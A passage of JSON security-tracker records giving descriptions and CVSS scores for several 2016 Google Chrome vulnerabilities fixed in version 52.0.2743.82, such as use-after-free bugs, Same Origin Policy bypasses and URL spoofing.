false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3763", "CVE-2016-5134"], "modified": "2020-08-18T08:30:37", "id": "RH:CVE-2016-5134", "href": "https://access.redhat.com/security/cve/cve-2016-5134", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:15", "description": "Use-after-free vulnerability in extensions/renderer/user_script_injector.cc in the Extensions subsystem in Google Chrome before 52.0.2743.82 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to script deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5136", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5136"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5136", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5136", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "ios/web/web_state/ui/crw_web_controller.mm in Google Chrome before 52.0.2743.82 on iOS does not ensure that an invalid URL is replaced with the about:blank URL, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1707", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1707"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1707", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1707", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The Service Workers subsystem in Google Chrome before 52.0.2743.82 does not properly implement the Secure Contexts specification during decisions about whether to control a subframe, which allows remote attackers to bypass the Same Origin Policy via an https IFRAME element inside an http IFRAME element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5132", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5132"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5132", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5132", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The PPAPI implementation in Google Chrome before 52.0.2743.82 does not validate the origin of IPC messages to the plugin broker process that should have come from the browser process, which allows remote attackers to bypass a sandbox protection mechanism via an unexpected message type, related to broker_process_dispatcher.cc, ppapi_plugin_process_host.cc, ppapi_thread.cc, and render_frame_message_filter.cc.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1706", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1706"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1706", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1706", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T17:47:15", "description": "objects.cc in Google V8 before 5.2.361.27, as used in Google Chrome before 52.0.2743.82, does not prevent API interceptors from modifying a store target without setting a property, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5128", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5128"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5128", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5128", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Google Chrome before 52.0.2743.82 mishandles origin information during proxy authentication, which allows man-in-the-middle attackers to spoof a proxy-authentication login prompt or trigger incorrect credential storage by modifying the client-server data stream.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5133", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5133"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5133", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5133", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The Chrome Web Store inline-installation implementation in the Extensions subsystem in Google Chrome before 52.0.2743.82 does not properly consider object lifetimes during progress observation, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1708", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1708"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1708", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1708", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Heap-based buffer overflow in the ByteArray::Get method in data/byte_array.cc in Google sfntly before 2016-06-10, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted SFNT font.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1709", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1709"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1709", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1709", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Google V8 before 5.2.361.32, as used in Google Chrome before 52.0.2743.82, does not properly process left-trimmed objects, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5129", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5129"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5129", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5129", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "The ChromeClientImpl::createWindow method in WebKit/Source/web/ChromeClientImpl.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not prevent window creation by a deferred frame, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1710", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1710"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1710", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "content/renderer/history_controller.cc in Google Chrome before 52.0.2743.82 does not properly restrict multiple uses of a JavaScript forward method, which allows remote attackers to spoof the URL display via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5130", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5130"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5130", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5130", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T14:41:10", "description": "Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5131", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5131"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5131", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5131", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "WebKit/Source/core/html/parser/HTMLPreloadScanner.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not consider referrer-policy information inside an HTML document during a preload request, which allows remote attackers to bypass the Content Security Policy (CSP) protection mechanism via a crafted web site, as demonstrated by a \"Content-Security-Policy: referrer origin-when-cross-origin\" header that overrides a \"<META name='referrer' content='no-referrer'>\" element.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5135", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5135"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5135", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5135", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:15", "description": "WebKit/Source/core/loader/FrameLoader.cpp in Blink, as used in Google Chrome before 52.0.2743.82, does not disable frame navigation during a detach operation on a DocumentLoader object, which allows remote attackers to bypass the Same Origin Policy via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1711", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1711"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1711", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1711", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Use-after-free vulnerability in WebKit/Source/core/editing/VisibleUnits.cpp in Blink, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code involving an @import at-rule in a Cascading Style Sheets (CSS) token sequence in conjunction with a rel=import attribute of a LINK element.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5127", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5127"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5127", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5127", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:15", "description": "Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-1705", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1705"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-1705", "href": "https://security-tracker.debian.org/tracker/CVE-2016-1705", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T19:29:32", "description": "The CSPSource::schemeMatches function in WebKit/Source/core/frame/csp/CSPSource.cpp in the Content Security Policy (CSP) implementation in Blink, as used in Google Chrome before 52.0.2743.82, does not apply http :80 policies to https :443 URLs and does not apply ws :80 policies to wss :443 URLs, which makes it easier for remote attackers to determine whether a specific HSTS web site has been visited by reading a CSP report. NOTE: this vulnerability is associated with a specification change after CVE-2016-1617 resolution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5137", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1617", "CVE-2016-5137"], "modified": "2016-07-23T19:59:00", "id": "DEBIANCVE:CVE-2016-5137", "href": "https://security-tracker.debian.org/tracker/CVE-2016-5137", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-17T19:29:32", "description": "net/proxy/proxy_service.cc in the Proxy Auto-Config (PAC) feature in Google Chrome before 52.0.2743.82 does not ensure that URL information is restricted to a scheme, host, and port, which allows remote attackers to discover credentials by operating a server with a PAC script, a related issue to CVE-2016-3763.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-07-23T19:59:00", "type": "debiancve", "title": "CVE-2016-5134", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 